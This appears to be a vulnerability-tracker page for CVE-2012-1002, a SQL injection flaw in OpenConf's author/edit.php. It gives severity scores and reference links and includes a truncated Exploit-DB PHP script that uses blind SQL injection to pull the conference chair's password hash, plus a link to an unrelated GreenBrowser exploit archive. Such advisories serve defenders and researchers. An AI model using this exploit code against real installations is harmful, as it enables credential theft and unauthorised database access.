CVE-2012-1002
published 2012-02-08CVE-2012-1002: SQL injection vulnerability in author/edit.php in OpenConf 4.x before 4.12 allows remote attackers to execute arbitrary SQL commands via the pid parameter.
PriorityP359critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
4.74%
90.7th percentile
SQL injection vulnerability in author/edit.php in OpenConf 4.x before 4.12 allows remote attackers to execute arbitrary SQL commands via the pid parameter.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zakongroup | openconf | — | — |
| zakongroup | openconf | — | — |
| zakongroup | openconf | — | — |
| zakongroup | openconf | — | — |
| zakongroup | openconf | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
OpenConf 4.11 - '/author/edit.php' Blind SQL Injection
exploitdb·2012-05-02·CVSS 10.0
CVE-2012-1002 [CRITICAL] OpenConf 4.11 - '/author/edit.php' Blind SQL Injection
OpenConf 4.11 - '/author/edit.php' Blind SQL Injection
---
\n";
print "\nExample....: php $argv[0] http://127.0.0.1/";
print "\nExample....: php $argv[0] http://localhost/openconf/\n";
die();
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_VERBOSE, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
if (!preg_match('/href="author\/edit.php"/', http_get('openconf.php'))) die("\n[-] Failed: submission edit disabled\n");
$index = 1;
$hash = '';
$chars = array_merge(range(48, 57), range(97, 102), array(0)); // 0-9 a-f
print "\n[-] Chair password hash...: ";
while (!strpos($hash,chr(0)))
{
for ($i = 0, $n = count($chars); $i
Exploit-DB
GreenBrowser 6.0.1002 - Search Bar Short Cut Button Double-Free Remote Memory Corruption
exploitdb·2012-01-12
CVE-2012-6041 GreenBrowser 6.0.1002 - Search Bar Short Cut Button Double-Free Remote Memory Corruption
GreenBrowser 6.0.1002 - Search Bar Short Cut Button Double-Free Remote Memory Corruption
---
source: https://www.securityfocus.com/bid/51393/info
GreenBrowser is prone to a remote use-after-free memory-corruption vulnerability.
Successfully exploiting this issue may allow attackers to execute arbitrary code in the context of the application. Failed exploit attempts will result in denial-of-service conditions.
GreenBrowser 6.0.1002 and prior versions are vulnerable.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36546.rar
No writeups or analysis indexed.
http://www.exploit-db.com/exploits/18820http://www.openconf.com/news/#20120202http://www.securityfocus.com/bid/51927https://exchange.xforce.ibmcloud.com/vulnerabilities/75399http://www.exploit-db.com/exploits/18820http://www.openconf.com/news/#20120202http://www.securityfocus.com/bid/51927https://exchange.xforce.ibmcloud.com/vulnerabilities/75399
2012-02-08
Published